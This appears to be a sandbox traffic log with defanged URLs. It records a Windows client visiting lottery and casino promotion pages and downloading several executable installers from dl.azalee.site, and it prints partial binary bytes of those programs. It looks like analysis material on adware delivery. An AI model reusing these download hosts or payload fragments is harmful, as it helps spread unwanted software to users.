Content-Type: text/html; charset=UTF-8

Set-Cookie: ab_key.address_autocomplete=1067015; path=/register.asp; domain=.freelotto.com

Set-Cookie: cookieEnable=enable; path=/

Content-Length: 34136

Accept-Ranges: bytes

Date: Sat, 15 Oct 2016 06:08:13 GMT

Via: 1.1 varnish

Age: 0

Connection: keep-alive

X-Served-By: cache-lcy1128-LCY

X-Cache: MISS

X-Cache-Hits: 0

X-Timer: S1476511693.498452,VS0,VE113

Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html la
ng="en">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head
>.<meta name="robots" content="noindex, follow" />.<meta h
ttp-equiv="Content-Type" content="text/html; charset=utf-8" />.<
meta name="viewport" content="initial-scale=1.0, width=device-width"&g
t;.<title>CERTIFIED WINNER CLAIM FORM</title>.<link hre
f="hXXp://f.pinid.com/css/register/CertifiedWinnerRSP.82125.cssasp?lan
g=en" rel="stylesheet" type="text/css" />...<script type="text/j
avascript">.  var _gaq = _gaq || [];..   _gaq.push(['_setAccount', 
'UA-2349802-18']);.   _gaq.push(['_setDomainName', 'freelotto.com']);.
   _gaq.push(['_trackPageview']);.   (function() {.     var ga = docum
ent.createElement('script'); ga.type = 'text/javascript'; ga.async = t
rue;.     ga.src = ('https:' == document.location.protocol ? 'hXXps://
' : 'hXXp://')   'stats.g.doubleclick.net/dc.js';.     var s = documen
t.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
.   })();.</script>..<script>.  (function(i,s,o,g,r,a,m){i
['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){.  (i[r].q=i[r].q||[
]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),.  m=s.ge
tElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a
,m).  })(window,document,'script','//VVV.google-analytics.com/analytic
s.js','ga');.  ga('create', 'UA-2349802-17', 'freelotto.com');.  g
<<< skipped >>>

GET /offer.asp?offer=14999&r=0.412759496485389 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.freelotto.com

Connection: Keep-Alive

Cookie: affiliateid=5388363; tid=668d6cba-f9e3-4038-9a03-fcf3a800299e; cookieEnable=enable; _ga=GA1.2.1534724702.1476511708; _gat=1; __utma=30605800.1534724702.1476511708.1476511709.1476511709.1; __utmb=30605800.1.10.1476511709; __utmc=30605800; __utmz=30605800.1476511709.1.1.utmcsr=YTZ|utmccn=EveryoneWinsTV|utmcmd=Display|utmctr=CPA|utmcct=CertifiedWinnerRSP; __utmt=1

HTTP/1.1 200 OK

Server: Apache/2.2.31

X-Frame-Options: SAMEORIGIN

Cache-Control: private

Content-Type: image/gif

Transfer-Encoding: chunked

Accept-Ranges: bytes

Date: Sat, 15 Oct 2016 06:08:17 GMT

Via: 1.1 varnish

Age: 0

Connection: keep-alive

X-Served-By: cache-lcy1128-LCY

X-Cache: MISS

X-Cache-Hits: 0

X-Timer: S1476511697.378163,VS0,VE85
17..GIF89a.......,...........0..HTTP/1.1 200 OK..Server: Apache/2.2.31
..X-Frame-Options: SAMEORIGIN..Cache-Control: private..Content-Type: i
mage/gif..Transfer-Encoding: chunked..Accept-Ranges: bytes..Date: Sat,
 15 Oct 2016 06:08:17 GMT..Via: 1.1 varnish..Age: 0..Connection: keep-
alive..X-Served-By: cache-lcy1128-LCY..X-Cache: MISS..X-Cache-Hits: 0.
.X-Timer: S1476511697.378163,VS0,VE85..17..GIF89a.......,...........0.
.

GET /download/3/WizzCasterInstaller.exe HTTP/1.1

Host: dl.azalee.site

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:50 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="WizzCasterInstaller.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
33c00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......W.........."[email protected]^... ...`....@.. .................
...................@.................................(^..O....`.......
................`.......\.............................................
.. ............... ..H............text....>... ...@................
.. ..`.rsrc........`.......B..............@[email protected].......`.......:..
[email protected]................\^......H.......@"...9..........8\....
...........................................0..6.......~..........%..|.
o.................(....(.......&...*.*..........//.......0...........(
......(.....o....s..... o.....s....%.o....%.o.....(.....o....o......s.
.......s......i.).....%......io.......o ...o ...(!........o"...r...p(#
...o$...*..-.r...ps%...z.(&...o'...%-.r3..ps%...z.......%...o(...&*.rQ
..p.....*....0.. ..........X..X...()...&(..........~....(......&..*...
......''........(*...*.~....-.r. .p.....( ...o,...s-........~....*.~..
..*.......*.~....*..(....*Vs....(/...t.........*BSJB............v2.0.5
0727......l.......#~..H...$...#Strings....l.... ..#US.<7......#GUID
...L7......#Blob...........W..........3........0.................../..
......................................."...........................(..
.........o.....P...................................~.....3...........)
.............#...P.......c.........c.....S.....>.....;.s.....s.....
....J....._...........9.....W.....^.....T.........................
<<< skipped >>>

GET /pp/promo/9302/img/logo-24-1.png HTTP/1.1

Accept: */*

Referer: hXXp://cosmicwin.com/vulkanchampion/p9302/?atp=MH RON&plid=1706&bnid=7462&goto=sitereg&face=casino

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn1.cosmicwin.com

Connection: Keep-Alive

Cookie: promouuid=PP5801c7cba9aa3; 3eca792413c698ac9e2064835341acba=1; _MHRON_p9302=1

HTTP/1.1 200 OK

Server: ucdn

Date: Sat, 15 Oct 2016 06:08:12 GMT

Content-Type: image/png

Content-Length: 21761

Connection: keep-alive

Keep-Alive: timeout=20

Last-Modified: Thu, 06 Oct 2016 15:28:22 GMT

ETag: "57f66d96-5501"

X-Ureq-ID: PYMqMNZBGwvbYkCmvc4f2OevbRq3YdLtBPh8IlceiB MxrFmIynxf0DAPAVfTm PXQ nxwdjwcYKVvDR4SoZ8mDi285TNPd90tyGQZ14jwnvMh7qmg==

Expires: Sun, 16 Oct 2016 11:17:07 GMT

Cache-Control: max-age=104935

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS

Accept-Ranges: bytes
.PNG........IHDR.....................gAMA......a.....sRGB.........PLTE
Liq...................................................................
)...,!g.....I.'......6..(5........2.....(....3.....8@.,. T`.De[..F.~.^
\Y..,ok...@z.<.f.LQ:l.0zb_.................&......Tk..V... ....^.Tf
........z..M....Up..o..f.......T`........................<...0.....
......L.....o........]e...9...Te:[email protected].=-.
2.......^u.....)....B.......,...`..[.....N.....FTD............ .0..A..
.Sa....0.6...%..a..;.S..................<.....m.........g..........
.....8.4.L.0.... .8...U0.r...).S6....;.MXGi..8....!Y......./..br.a.yC.
-....2Do.#..v.r.# ><..QTW..7.4D...Y_wMt..."..-\..>?GF..../..-
..H.Pm...r.....%..9.J09e2Nzdca.#[email protected]....!wvvo..9.
....N.%...MJ..Z.7-.._$VI..lN.}$JtmCFQ.u|../U..y`U....z.......bn....c..
....Oq.o..!..S..o..,....tRNS..:.0.'....q..RAJ}..].g.G.'....m.b........
......................................................................
......................................................................
...........M.. .IDATx....O[W...4......-YF,[email protected].%/...S, ...I
&f.y.[...H...5U..x.*.lX4...."!.F.PS..q.9...~.tfU~..H........~.y...s.OO
...a...........gT7>(.....z..>.......50:.K.B..q.c_....U...^.`t&D.
.K...`..B.`..,......BL..H.C8.$A t....6*..[..cBX...@...@.$.Bo...g.wY...
,....n....gq.z.&...%.!...B.$.msX.]@...ey...........u3.p$...O...d.. Q8.
.V..9L.......>K.....G#............B...4...b.i..cb..w>>".0.G.,
l.;...gu.prQ..|.(..E...L......4.9.Q.9a.dA..2U0..A...*..JR...h.....
<<< skipped >>>

GET /pp/promo/9302/img/logo-24-2.png HTTP/1.1

Accept: */*

Referer: hXXp://cosmicwin.com/vulkanchampion/p9302/?atp=MH RON&plid=1706&bnid=7462&goto=sitereg&face=casino

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn1.cosmicwin.com

Connection: Keep-Alive

Cookie: promouuid=PP5801c7cba9aa3; 3eca792413c698ac9e2064835341acba=1; _MHRON_p9302=1

HTTP/1.1 200 OK

Server: ucdn

Date: Sat, 15 Oct 2016 06:08:12 GMT

Content-Type: image/png

Content-Length: 21167

Connection: keep-alive

Keep-Alive: timeout=20

Last-Modified: Thu, 06 Oct 2016 15:28:22 GMT

ETag: "57f66d96-52af"

X-Ureq-ID: PYMqMNZBGwvbYkCmvc4f2OevbRq3YdLtBPh8IlceiB MxrFmIynxf0DAPAVfTm PXQ nxwdjwcYKVvDR4SoZ8mDi285TNPd90tyGQZ14jwnvMh7qmg==

Expires: Sun, 16 Oct 2016 11:17:07 GMT

Cache-Control: max-age=104935

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS

Accept-Ranges: bytes
.PNG........IHDR.....................gAMA......a.....sRGB.........PLTE
Liq................................................................)..
..*..!p..F..\..7......1.....!...]...1.t...H_.0@.....*.#'....*0.$@G.}#@
^Y..3vu!bZ...u..8._3h{.E;.TR'gcJ...h}......^...Tg....Tl...........T...
..!.. ........4..>'.............k.S`...=....H..`..............x....
............K........*........UqC.:...;.!....Se.../.3.8..r.9......Tb..
.......C...D..GU%%:..$.S..D.3.....,............[`0>OH5.$%E/...=..c.
/......0...MS..6....0.a....%)S..*0...u...k.......]n......5......2C....
e.8....8....`...F)[email protected].'.o.Zu...Jn.........\/2g.'.fu.X{.f.*v..H.
.%V.`.x,)....1Lz....`g?`..#...=LPY......7...K...1....5J9..&6.7.G...a`]
..=.g.....ax...#5....\f{g.........Rl0%.jG............e.DfONyU..yyt.."@
@='..\ Y.:.../n..~,OCO..!.Gm...Gn......Vm....Zm....%...P...}zC....a.q.
....A......>tRNS.HSp.>-...&..5...a|...........M.9b....m'.z......
..............u. ... .IDATx....oRy......qX.eCi..CH_...m./..).6.4#[email protected]
Q.q.I6.:.$pQ6.q...#.....f.h..\4...t.....lz....w........h.........QO.:.
..mN.......1..6- >.9......J.....8_.|.e.......#c!. .H.....-C7.%..1!"
.}T(...`.]8....f2..1..$...P .. ..4..}..... ........I..........l..1....
.=:Cww.^R.L........B.`!..n.R0E....K.r......X.$...!Y...... .~......xTU5
.#.....".."\..,(.:&!9(<..#.)..x?2A$d..FD.....BC!9.............%....
..].L.z.........NH.. '..!.......7).C......e...$.DN<..Cx../[email protected]._D.
.2.l6...M:..f2....)-L..I..."A"'.........`)..|...n}t...^."J......$..$..
.."B@NbdZ`H1.f.y!..Q.j*....r ...lS.......x...R..i"..#f . ..'....D.
<<< skipped >>>

GET /pp/promo/9302/img/txt1.png HTTP/1.1

Accept: */*

Referer: hXXp://cosmicwin.com/vulkanchampion/p9302/?atp=MH RON&plid=1706&bnid=7462&goto=sitereg&face=casino

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn1.cosmicwin.com

Connection: Keep-Alive

Cookie: promouuid=PP5801c7cba9aa3; 3eca792413c698ac9e2064835341acba=1; _MHRON_p9302=1

HTTP/1.1 200 OK

Server: ucdn

Date: Sat, 15 Oct 2016 06:08:12 GMT

Content-Type: image/png

Content-Length: 31700

Connection: keep-alive

Keep-Alive: timeout=20

Last-Modified: Thu, 06 Oct 2016 15:28:22 GMT

ETag: "57f66d96-7bd4"

X-Ureq-ID: PYMqMNZBGwvbYkCmvc4f2OevbRq3YdLtBPh8IlceiB MxrFmIynxf0DAPAVfTm PXQ nxwdjwcYKVvDR4SoZ8mDi285TNPd90tyGQZ14jwnvMh7qmg==

Expires: Sun, 16 Oct 2016 11:17:07 GMT

Cache-Control: max-age=104935

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS

Accept-Ranges: bytes
.PNG........IHDR...,..........:.5....gAMA......a.....sRGB.........PLTE
Liq...................................................................
......................................................................
..................................0..... ........Q3._>.......*..A).
U9.b2.pI.D,.4!....R/.!..b@."..>&. ..K-.D-.......;%.... ..pK&.a.$..=
&......)[email protected]..%[email protected])......"w>...e>(...(.[)...zX/..
NK([email protected].[...L..u....T...H.s$.K........_.....X..v.
[email protected].....~:.~Gh=...^.....Z.N.E/..x.........'D..;....UN&...L..6..h.
._..=../.k.._..u..f.........D...}N...s.Y........[..T..z..U..k..b.....a
.W,.([email protected].|E.....[.....N..s........I..L..F.......
..)...........$..&.~...'....]..Z..o..K..a...0.S...........f..S..A.....
..z\...T|5.....z..8........."........>.2..u...C..=........W..#.r...
l..p..".....O".......tRNS..........#.%9 <....13KG^.. [email protected].(DUb6.l.
.NR..wo..s..}z...........................|........s......i.........._.
..W..........J............x...w...TW>...._.. .IDATx...oL.y..]..=...
.T.D.Ca.!...!......sAV......7.Mj......../........t...-.O25.y.4i.B3..g.
V/iv_-o...7......yw.......o:.............]UXX...}.~5`.n..o..S5........
.9.......!X....h...k.!..#...7.......8......?8...]Gs....m..FC...<..Y
..vFH..m.h...a...*S......J'_/..|...Q%.vh4d..v...B..#9@rxH./Rt.......&.
[email protected]/.e$g!Y.P....qX..7.<>.O.BO.zr.....l.F.F...
.,&*3Q......YBTpH.?.....{K.....'..L..UJD..)...]F .;..pK..n..D..5#....(
...7.<^.P>8....FAFv.-.T...N..c....2G.H... Q\DFD.C*.)Eg.\.I9z
<<< skipped >>>

GET /pp/promo/9302/img/txt2.png HTTP/1.1

Accept: */*

Referer: hXXp://cosmicwin.com/vulkanchampion/p9302/?atp=MH RON&plid=1706&bnid=7462&goto=sitereg&face=casino

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn1.cosmicwin.com

Connection: Keep-Alive

Cookie: promouuid=PP5801c7cba9aa3; 3eca792413c698ac9e2064835341acba=1; _MHRON_p9302=1

HTTP/1.1 200 OK

Server: ucdn

Date: Sat, 15 Oct 2016 06:08:12 GMT

Content-Type: image/png

Content-Length: 31174

Connection: keep-alive

Keep-Alive: timeout=20

Last-Modified: Thu, 06 Oct 2016 15:28:22 GMT

ETag: "57f66d96-79c6"

X-Ureq-ID: PYMqMNZBGwvbYkCmvc4f2OevbRq3YdLtBPh8IlceiB MxrFmIynxf0DAPAVfTm PXQ nxwdjwcYKVvDR4SoZ8mDi285TNPd90tyGQZ14jwnvMh7qmg==

Expires: Sun, 16 Oct 2016 11:17:07 GMT

Cache-Control: max-age=104935

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS

Accept-Ranges: bytes
.PNG........IHDR...,..........:.5....gAMA......a.....sRGB.........PLTE
Liq...................................................................
......................................................................
............................K2..../..A*.`1....qO....U;._D )..;%.%..I..
^> 4!......."..T7....$..#..lJ&...S6.E.. ..:%...'-..R..g:....>*..
..gM,xS(.v..l0...?)...#e>..w6..G...rE.{Y*..8.d6:%...D..PyE...&..b..
...@..]..!..<.F..T.........T..xu<.....R..u".yI.k..._.._.Z...$..A
.x9.e..y.hU,.p.Q;......?..5.....)..W..G..N.e...i..`.v..n.;...N.N%.C ..
.t.R..}..K.....]..Z.V)..X..e.....]..Q.....^..X.k8.xL.....n........N...
...!....`..W.....A......'.<..S..w... .......V.........<.U..Z..g.
..*.....&.I.^@.{?.kD........=......'....P..Z..D..K....,....8.n...%..5.
...{...>.3...D.g..^..a&.f.............x2.........K..R..4.."P8... ..
p..}..\..m..^..D..)...F.......tRNS...........1."(9 [email protected].<`.SN.n
.]..%{.dH..isw.EB..........................~......w.....n......f.....]
..........S..................j......IY..?r... .IDATx...mH.y...m.>..
5.]kk.....}w....w....Z.g.'=.'.ld..-......m >.dP3.lf.H^........8B.0Q
."...@^i_.....$3.c..].z.|..<.....g.....o....dtn.JJJv....W...FI...].
S....!....h.....>......5...I..s78...A..........V.....|.........*<
;i'<..S....d.y...Q....q.n...."4._.zn'$.......~.J..8h'Dy......s.f...
I.)).[.!...C.x........6........>.......M...)N.#..5......qBC....{Uf.
...<t...O......H.._.g1...>m..h..9...c9....Izz4...'KM^>...L S,
.;.....9.......1..U.dV..U..F|4p.....oi.....1..O....].d.&k#FD.lTd.I
<<< skipped >>>

GET /pp/promo/9302/img/btns.png HTTP/1.1

Accept: */*

Referer: hXXp://cosmicwin.com/vulkanchampion/p9302/?atp=MH RON&plid=1706&bnid=7462&goto=sitereg&face=casino

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn1.cosmicwin.com

Connection: Keep-Alive

Cookie: promouuid=PP5801c7cba9aa3; 3eca792413c698ac9e2064835341acba=1; _MHRON_p9302=1

HTTP/1.1 200 OK

Server: ucdn

Date: Sat, 15 Oct 2016 06:08:12 GMT

Content-Type: image/png

Content-Length: 21064

Connection: keep-alive

Keep-Alive: timeout=20

Last-Modified: Thu, 06 Oct 2016 15:28:22 GMT

ETag: "57f66d96-5248"

X-Ureq-ID: PYMqMNZBGwvbYkCmvc4f2OevbRq3YdLtBPh8IlceiB MxrFmIynxf0DAPAVfTm PXQ nxwdjwcYKVvDR4SoZ8mDi285TNPd90tyGQZ14jwnvMh7qmg==

Expires: Sun, 16 Oct 2016 11:17:07 GMT

Cache-Control: max-age=104935

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS

Accept-Ranges: bytes
.PNG........IHDR...y.........6.i.....PLTE............$=.$<....*E.(A
.$=.g........}..\..]..Z..Y..{..":."=.%B.'E.{[email protected]..~..T..F..(?.L..
*F.K..X..)B.Z..^..n..C..W..u..U..F..'C.P..P..H..t..Y..u..h..C..o..n..2
k.}.....r..l..8~.I..G..]..R../s.Q..Z..D..p..[..#=.=..N..e..j..v..s..e.
.)\.q..j..z..p..,b.|..E..b...........4r.T..P..1y.L..A..z.....k..M.._..
...$a.C..6..y..h..y..|........l..Q..m.....B.....X..x.....{..Q..&>.?
..8w.c..r..V..&Y....w..'Q.f..W........K..T..`.....;..J.....g..)g...Z..
.u..|.Xh..b..i..1f.`..i..(F.c.._..l..]..f..P..9..F.....{..$L."E.>..
...T...l.X..]..]..`..J.....Q..B..~..b.....r........\..F.....O.._......
..Z..J..I........\.......S..Z?x......W;n.f.....Y....X...o..]..O.......
...\d..Bv.......X........f.?.....v.........v.W.....\q.......#..*..Eg..
t.W..pk..x.7..k......y..........mS}....q.Cc....tB.q.....tRNS.....<.
.e.......N.IDATx....xUE./~.t.}..N..#[email protected]....$&@...@ .C !.....h...
...`d.I....id..[[.....E..q..C.....5U.....~...}..u....V....V..}8.../?..
1..JxL.......|......O.........tn....<...g8<...g.....F. A.L.....&
\xV.9?N."...[.gi.....wa....C.......T.._p.za......[W.;.M.>...._.....
......?.....k'. a......SS|.s..y................s.#...s?P.s..^i..ZOx...
..z..G'./.....e.{..}..=......v{..Z.....;.............*[email protected]...
.Oy..........^....j..<kv...q-.Z..!.!....\.l..u.c8.a{......~t$....!.
.#.x..q...G.n.......K..2...>..$q).....p....f......<..[G.k.Q..*.U
...G..x<.4U...(.....O=.._\.N9./k..........N.Z..<...?.oi...M..".D
[email protected].;....f ].....:#M.u.C..4K..}.5..!..e ..j........I.<
<<< skipped >>>

GET /SiteSeal/images/gs_noscript_125-50_en.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: seal.globalsign.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:08:15 GMT

Content-Type: image/gif

Content-Length: 2212

Connection: keep-alive

Set-Cookie: __cfduid=d2bf4e99b66022d693389ce9c7fd5192f1476511695; expires=Sun, 15-Oct-17 06:08:15 GMT; path=/; domain=.globalsign.com; HttpOnly

ETag: W/"2212-1470642162000"

Last-Modified: Mon, 08 Aug 2016 07:42:42 GMT

Via: AX-CACHE-2.7:34

CF-Cache-Status: HIT

Expires: Sat, 15 Oct 2016 18:08:15 GMT

Cache-Control: public, max-age=43200

Accept-Ranges: bytes

Server: cloudflare-nginx

CF-RAY: 2f21187201b62944-OTP
GIF89a}[email protected]
......fff........."""...............{{{VVV............0.........p.`...
..... y.p.....P..===.........BBB.................................!...,
.?.,....}.2...j..pH,....r.l:...tJ.Z...v..z...xL.....z.n....|N.....~...
.................................................bA.!.....?.,....r.-..
.....X4..I..I.\(....9x6.$)1$1..oX.`....I.Pi....p.`7....1h(..F:.HRP..Y.
.....!.......!.9...V..,F....DL!.6<....F..82#rK..#{)-9._ZJ\.\d<.6
...,0P...G.W(.,P-^.X..$.L...y_J..H".#: ....Z".0."..#........Vl. .Z...V
$9.J..Eo8.......... .(...**..G"..I...d.N.<.-.uJB.........&$..!...0z
..&I...P! ..]1{.x.O.....)J..&;4.j.8Vi.......f@HR........:6d.=.P..HGc.3
...A_.C.)..W....._.e.--.r......P.C\,R.....(8..'.....T.Kp. =..g....j..i
5.%........y.JDh!*2).@;.v...........'..O33V.B6..-......84*..PT{.PC.6L(
I..TPA....A'.8p....`.....kB!L.....&...".Xa..08......."..k.eh..-..I....
...BJC......""&...%.0!............ ......@E&...........Q.?..Y........N
.............$.8 .............4.:.2..O&. `......8.h...$p...th.....R(.&
...:....L.h.........(..\..T._y5.R.&....r..._-....h....f....f........B.
.rU..;........J;. ..N...N.-....%[email protected] .....<A.M....H1]..S..
...b...........L.A .4.c'%...B....*-.....`.c.....2U....p.........8.48ix
...s@%..N%M.........v...@`..c>...#..b:{u9..$........}.......y..|..c
.P..kT1xqd..P.L. ."lZ....L..u.........<.I.."..x.y.. .b........h.!..
q.!..O=..../.Q...K.@.>..w..x.w......}3...X .!..`.d..a...._.....Z...
.....}.......Jm.......,.KbR..jt.~....x...!<...D.c..1.......q.P.
<<< skipped >>>

GET /px/pxc.php HTTP/1.1

Host: sup.newsoftweb.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Sat, 15 Oct 2016 06:07:37 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.9-1ubuntu4.14
1..5..0..HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Sat, 15 Oct 2016 
06:07:37 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Con
nection: keep-alive..X-Powered-By: PHP/5.5.9-1ubuntu4.14..1..5..0..

GET /download/1/wizzproduct.exe HTTP/1.1

Host: dl.azalee.site

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:44 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="wizzproduct.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
3d200..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...^..X.........."...0.............:.... ........@.. .................
...... [email protected].......,....
......................................................................
.. ............... ..H............text...@.... ...................... 
..`.rsrc...,...........................@[email protected].....................
[email protected]".......................
........................................0..6.......~..........%..|.o..
...............(....(.......&...*.*..........//.......0...........(...
...(.....o....s..... o.....s....%.o....%.o.....(.....o....o......s....
....s .....i.,.....%......io!......o"...o"...(#........o$...r...p(%...
o&...*..-.r...ps'...z.((...o)...%-.r3..ps'...z.......%...o*...&*.rQ..p
.....*....0..C.......r...p...... ...X....0...( ......X....2..(........
..~....(......&..*.......(..?........(,...*.~....-.r...p.....(-...o...
.s/........~....*.~....*.......*.~....*..(0...*Vs....(1...t.........*B
SJB............v2.0.50727......l.......#~..x.......#Strings........4..
.#US.P.......#GUID...`...@...#Blob...........WU.........3........3....
...............1.............................................Z........
.......&...........l.......S.....S...}.S.....S.....S.....S...).S......
...u.....D.S...D.....a.................e.......j.....#...G............
.....Z.......1...z./...2...................................u.6....
<<< skipped >>>

GET /download/1/soundplus-widget.exe HTTP/1.1

Host: dl.azalee.site

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:45 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="soundplus-widget.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
2f22d9..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$........3(.
.RF..RF..RF.*]...RF..RG.pRF.*][email protected]...........
..............PE..L...ly.V.................^..........O2.......p....@.
......................... ............................................
...s..........hm......................................................
.....................p...............................text...J\.......^
.................. ..`.rdata..^....p.......b..............@[email protected]...
[email protected]...`...P........................
...rsrc...hm.......n...z..............@..@............................
......................................................................
......................................................................
......................................................................
......................................................................
....................................................U....\.}..t .}.F.E
[email protected][email protected]
.u....q@..}[email protected]... M.......M....3.....FQ.....NU
..M..........VT..U.....FP..E...............E.P.M...Xp@..E...E.P.E.P.u.
[email protected]}[email protected].}.j.W.E......E.......Dp
@[email protected]@[email protected] [email protected]...
.r@._^3.[.....L$...?B...Si.....VW.T.....tO.q.3.;5.?B.sB..i......D.....
..t.G.....t...O..t .....u...3....3...F.....;5.?B.r._^[...U..QQ.U.S
<<< skipped >>>

GET /download/1/soundplus-uninstaller.exe HTTP/1.1

Host: dl.azalee.site

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:56 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="soundplus-uninstaller.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
16a600..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L...Z..X.........."...0.................. ........@.. ................
....................@[email protected].......,...
......................................................................
... ............... ..H............text........ ......................
 ..`.rsrc...,...........................@[email protected]....................
[email protected]"..............P.......
.........................................0..6.......~..........%..|.o.
................(....(.......&...*.*..........//.......0...........(..
....(.....o....s..... o.....s....%.o....%.o.....(.....o....o......s...
.....s .....i.,.....%......io!......o"...o"...(#........o$...r...p(%..
.o&...*..-.r...ps'...z.((...o)...%-.r3..ps'...z.......%...o*...&*.rQ..
p.....*....0..C.......rD..p...... ...X....0...( ......X....2..(.......
...~....(......&..*.......(..?........(,...*.~....-.rJ..p.....(-...o..
..s/........~....*.~....*.......*.~....*..(0...*Vs....(1...t.........*
BSJB............v2.0.50727......l.......#~..x.......#Strings..........
..#US.........#GUID.......@...#Blob...........WU.........3........3...
................1.............................................Z.......
........&...........l.......S.....S...}.S.....S.....S.....S...).S.....
....u.....D.S...D.....a.................e.......j.....#...G...........
......Z.......1...z./...2...................................u.6...
<<< skipped >>>

GET /1/84bb06feff?a=15611681&v=974.7d740e1&to=NQEGZkFWWBdQUURRWgxLMUBaGF8KVVdIFkUKFA==&rst=1375&ref=hXXp://cosmicwin.com/vulkanchampion/p9302/&ap=54&fe=1047&dc=1047&at=GUYFEAlMSxk=&jsonp=NREUM.setToken HTTP/1.1

Accept: */*

Referer: hXXp://cosmicwin.com/vulkanchampion/p9302/?atp=MH RON&plid=1706&bnid=7462&goto=sitereg&face=casino

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: bam.nr-data.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Set-Cookie: JSESSIONID=29b97dcf8132f0a4;Path=/;Domain=.nr-data.net

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Content-Type: text/javascript;charset=ISO-8859-1

Content-Length: 57
NREUM.setToken({'stn':0,'err':0,'ins':0,'cap':0,'spa':0})HTTP/1.1 200 
OK..Set-Cookie: JSESSIONID=29b97dcf8132f0a4;Path=/;Domain=.nr-data.net
..Expires: Thu, 01 Jan 1970 00:00:00 GMT..Content-Type: text/javascrip
t;charset=ISO-8859-1..Content-Length: 57..NREUM.setToken({'stn':0,'err
